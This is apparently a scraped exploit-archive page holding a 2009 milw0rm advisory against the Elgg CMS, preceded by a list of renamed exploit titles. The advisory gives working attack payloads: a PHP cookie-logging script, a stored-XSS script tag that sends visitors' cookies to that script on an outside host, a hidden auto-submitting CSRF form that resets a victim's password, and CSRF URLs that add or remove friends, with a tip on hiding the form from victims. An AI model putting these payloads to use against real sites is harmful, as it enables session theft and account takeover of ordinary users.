477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
107 lines
4.6 KiB
Text
Executable file
107 lines
4.6 KiB
Text
Executable file
###################################################################################
|
|
[+] CMS Elgg <1.00 (XSS;CSRF;Cambia Password)Multiple Remote Vulnerabilities
|
|
[+] Discovered By ThE Lorddemon lorddemon@zonartm.org
|
|
[+] Vendor:http://elgg.org/
|
|
[+] Greetings: Project MEMI-Bolivia, OpTix, RTM security Group http://zonartm.og
|
|
###################################################################################
|
|
|
|
Change Password Remotely:
|
|
+++++++++++++++++++++++++
|
|
1) You Must Register In ThE site.
|
|
2) Login
|
|
3) Create a new topic and then edit
|
|
http://www.sitiosocial.com/_templates/
|
|
|
|
Edit the new topic (Template) have the option to insert HTML, JavaScript
|
|
##################################################################################
|
|
Exploit& HTML Injection
|
|
|
|
###Cookie Grabber####
|
|
[+] Discovered By ThE Lorddemon
|
|
[+] Vendor:http://elgg.org/
|
|
##################################################################################
|
|
PoC
|
|
--
|
|
Script to store cookies
|
|
<?php
|
|
$cookie = $_GET['cookie'];
|
|
$log = fopen("log.txt", "a");
|
|
fwrite($log, $cookie ."\n");
|
|
fclose($log);
|
|
?>
|
|
uploading to a host.Save as cookie.php
|
|
|
|
[+]Exploit:
|
|
-------
|
|
1) Register in The SIte
|
|
2) add to the Template
|
|
<script language='Javascript' src='http://localhost/cookie.php?cookie='+document.cooke></script>
|
|
|
|
The victim would be anyone who comes to your blog.
|
|
|
|
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
###Change Pasword####
|
|
[+] Discovered By ThE Lorddemon lorddemon@zonartm.org
|
|
[+] http://zonartm.org
|
|
[+] Vendor:http://elgg.org/
|
|
#######################################################################################################
|
|
|
|
1) Register in The SIte
|
|
2) add to the Template
|
|
|
|
<body onload="document.forms.g.submit();">
|
|
|
|
<iframe name="my_frame" ALING="BOTTOM" scrolling=no width=1 heigth=1></iframe>
|
|
|
|
<form method="POST" target="my_frame" action="http://www.sitiosocial.com/_userdetails/index.php" name="g" id="g">
|
|
<input type=hidden name="name" value="">
|
|
<input type=hidden name="email" value="">
|
|
<input type=hidden name="moderation" value="no">
|
|
<input type=hidden name="publiccoments" value="no">
|
|
<input type=hidden name="receivenotifications" value="no">
|
|
<input type=hidden name="password1" value="password"> <------ Eye with this
|
|
<input type=hidden name="password2" value="password"> <------ Eye with this
|
|
<input type=hidden name="flag[commentwall_access]" value="LOGGED_IN">
|
|
<input type=hidden name="lang" value="">
|
|
<input type=hidden name="flag[sidebarsidebar-profile]" value="yes">
|
|
<input type=hidden name="flag[sidebarsidebar-communities]" value="yes">
|
|
<input type=hidden name="flag[sidebarsidebar-blog]" value="yes">
|
|
<input type=hidden name="flag[sidebarsidebar-friends]" value="yes">
|
|
<input type=hidden name="visualeditor" value="yes">
|
|
<input type=hidden name="action" value="userdetails:update">
|
|
<input type=hidden name="id" value="id_victima"> <---------Eye with this
|
|
<input type=hidden name="profile_id" value="id_victima"> <---------Eye with this
|
|
</form>
|
|
|
|
It is better to send all the form inside a Div tag to pass unnoticed
|
|
|
|
The victim would be the user with the id.
|
|
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
###You Be More Popular, or remove the victim to Friends####
|
|
[+] Discovered By ThE Lorddemon lorddemon@zonartm.org
|
|
[+] http://zonartm.org
|
|
[+] Vendor:http://elgg.org/
|
|
#################################################################################################################
|
|
|
|
1) Register in The SIte
|
|
2) Add to the Template
|
|
|
|
http://www.sitioSocial.com/mod/friend/index.php?friends_name=[vacio]&action=friend&friend_id=[tu id]
|
|
|
|
viewing parameters from the viewpoint of the attacker.
|
|
|
|
Friends_name=is the user name who made you want to be your friend. (may be empty)
|
|
Action= friend or unfriend.
|
|
Friend_id=User ID. who is performing the action
|
|
|
|
You can also remove it with friends cuanquier user.
|
|
|
|
http://www.sitioSocial.com/mod/friend/index.php?friends_name=[vacio]&action=Unfriend&friend_id=[id_victima]
|
|
|
|
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
# milw0rm.com [2009-06-22]
|